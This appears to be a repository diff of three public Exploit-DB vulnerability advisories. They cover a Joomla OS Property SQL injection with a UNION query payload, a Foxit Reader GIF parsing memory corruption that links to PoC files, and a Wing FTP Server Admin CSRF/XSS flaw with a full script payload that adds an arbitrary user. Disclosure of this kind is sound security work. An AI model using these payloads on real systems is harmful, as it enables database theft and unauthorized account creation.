+http://joomdonation.com/joomla-extensions/os-property-joomla-real-estate.html
+
+Example URL:
+
+http://172.31.16.51/index.php?option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31
+
+
+Parameter: country_id (GET)
+
+   Type: UNION query
+
+   Title: MySQL UNION query (NULL) - 2 columns
+
+   Payload:
+option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31'
+UNION ALL SELECT
+NULL,CONCAT(0x716a627171,0x797774584a4b4954714d,0x7162717071)#
+
+
+
+-- 
+http://volatile-minds.blogspot.com -- blog
+http://www.volatileminds.net -- website

platforms/windows/local/36859.txt

@@ -0,0 +1,65 @@
+#####################################################################################
+
+Application:   Foxit Reader PDF Parsing  Memory Corruption
+
+Platforms:   Windows
+
+Versions:   The vulnerabilities are reported in Foxit Reader and Foxit Enterprise Reader versions 7.1.0.306 and 7.1.3.320 and Foxit Phantom PDF versions 7.1.0.306, 7.1.2.311, and 7.1.3.320.
+
+Secunia:   SA63346
+
+{PRL}:   2015-05
+
+Author:   Francis Provencher (Protek Research Lab’s)
+
+Website:   http://www.protekresearchlab.com/
+
+Twitter:   @ProtekResearch
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+===============
+1) Introduction
+===============
+
+Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files.[3] Early versions of Foxit Reader were notable for startup performance and small file size.[citation needed] Foxit has been compared favorably toAdobe Reader.[4][5][6] The Windows version allows annotating and saving unfinished PDF forms, FDF import/export, converting to text, highlighting and drawing.
+
+(http://en.wikipedia.org/wiki/Foxit_Reader)
+
+#####################################################################################
+
+============================
+2) Report Timeline
+============================
+
+2015-04-09: Francis Provencher from Protek Research Lab’s found the issue;
+2015-04-13: Foxit Security Response Team confirmed the issue;
+2015-04-28: Foxit fixed the issue;
+#####################################################################################
+
+============================
+3) Technical details
+============================
+
+A memory corruption occured within the LZW algorithm that is used to decode GIF. A specifically crafted GIF could lead to a controled memory corruption.
+
+#####################################################################################
+
+===========
+
+4) POC
+
+===========
+
+http://protekresearchlab.com/exploits/PRL-2015-05.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36859.pdf
+
+
+###############################################################################

platforms/windows/webapps/36861.txt

@@ -0,0 +1,133 @@
+Document Title:
+===============
+Wing FTP Server Admin 4.4.5 - CSRF & Cross Site Scripting Vulnerabilities
+
+
+Release Date:
+=============
+2015-04-28
+
+
+apparitionsec ID (AS-ID):
+====================================
+AS-WFTP0328
+
+
+Common Vulnerability Scoring System:
+====================================
+Overall CVSS Score 8.9
+
+
+Product:
+===============================
+Wing FTP Server is a Web based administration FTP client that supports
+following protocols FTP, FTPS, HTTPS, SSH
+
+
+
+Advisory Information:
+==============================
+Security researcher John Page discovered a CSRF & client-side cross site
+scripting web vulnerability within Wing FTP Server Admin that allows adding
+arbitrary users to the system.
+
+
+
+Vulnerability Disclosure Timeline:
+==================================
+March 28, 2015: Vendor Notification
+March 28, 2015: Vendor Response/Feedback
+April 19, 2015: Vendor Notification
+April 28, 2015: Vendor released new  patched version 4.4.6
+April 28, 2015: Public Disclosure - John Page
+
+
+
+Affected Product(s):
+====================
+Wing FTP Server Admin 4.4.5
+Product: Wing FTP Server - Admin
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+
+
+Request Method(s):
+                                [+] POST & GET
+
+
+Vulnerable Product:
+                                [+] Wing FTP Server Admin 4.4.5
+
+
+Vulnerable Parameter(s):
+                                [+] domain & type
+
+
+Affected Area(s):
+                                [+] Server Admin
+
+
+Proof of Concept (POC):
+=======================
+The CSRF and client-side cross site scripting web vulnerability can be
+exploited by remote attackers without privileged application user account
+and with low user interaction (click). Payload will add arbitrary users to
+the system.
+
+POC: Example
+
+http://localhost:5466/admin_loglist.html?domain=[CSRF & XSS VULNERABILITIES]
+
+POC: Payload(s) Add arbitrary user to the system:
+
+http://localhost:5466/admin_loglist.html?domain=%3Cscript%3EajaxRequest%28%27admin_adduser%27,%22domain%3dtest%26user%3d{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a%27kuQrwgV%27,%27oldpassword%27%3a%27%27,%27max_download%27%3a%270%27,%27max_upload%27%3a%270%27,%27max_download_account%27%3a%270%27,%27max_upload_account%27%3a%270%27,%27max_connection%27%3a%270%27,%27connect_timeout%27%3a%275%27,%27idle_timeout%27%3a%275%27,%27connect_per_ip%27%3a%270%27,%27pass_length%27%3a%270%27,%27show_hidden_file%27%3a0,%27change_pass%27%3a0,%27send_message%27%3a0,%27ratio_credit%27%3a%270%27,%27ratio_download%27%3a%271%27,%27ratio_upload%27%3a%271%27,%27ratio_count_method%27%3a0,%27enable_ratio%27%3a0,%27current_quota%27%3a%270%27,%27max_quota%27%3a%270%27,%27enable_quota%27%3a0,%27note_name%27%3a%27%27,%27note_address%27%3a%27%27,%27note_zip%27%3a%27%27,%27note_phone%27%3a%27%27,%27note_fax%27%3a%27%27,%27note_email%27%3a%27%27,%27note_memo%27%3a%27%27,%27ipmasks%27%3a[],%27filemas
+ ks%27%3a[],%27directories%27%3a[],%27usergroups%27%3a[],%27subdir_perm%27%3a[],%27enable_schedule%27%3a0,%27schedules%27%3a[],%27limit_reset_type%27%3a%270%27,%27limit_enable_upload%27%3a0,%27cur_upload_size%27%3a%270%27,%27max_upload_size%27%3a%270%27,%27limit_enable_download%27%3a0,%27cur_download_size%27%3a%270%27,%27max_download_size%27%3a%270%27,%27enable_expire%27%3a0,%27expiretime%27%3a%272015-05-18%2021%3a17%3a46%27,%27protocol_type%27%3a63,%27enable_password%27%3a1,%27enable_account%27%3a1,%27ssh_pubkey_path%27%3a%27%27,%27enable_ssh_pubkey_auth%27%3a0,%27ssh_auth_method%27%3a0}%22,%20%22post%22%29%3C/script%3E
+
+
+POC XSS:
+http://localhost:5466/admin_viewstatus.html?domain=
+
+
+POC XSS:
+http://localhost:5466/admin_event_list.html?type=
+
+
+Solution - Fix & Patch:
+=======================
+Vendor released updated version 4.4.6 Fix/Patch (Wing FTP Server)
+
+
+Security Risk:
+==============
+The security risk of the CSRF client-side cross site scripting web
+vulnerability in the `domain` admin_loglist.html value has CVSS Score of 8.9
+
+
+Credits & Authors:
+==================
+John Page ( hyp3rlinx ) - ISR godz @apparitionsec
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any
+warranty. the security research reporter John Page disclaims all
+warranties, either expressed or implied, including the warranties of
+merchantability and capability for a particular purpose. apparitionsec or
+its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits or special
+damages.
+
+Domains:  hyp3rlinx.altervista.org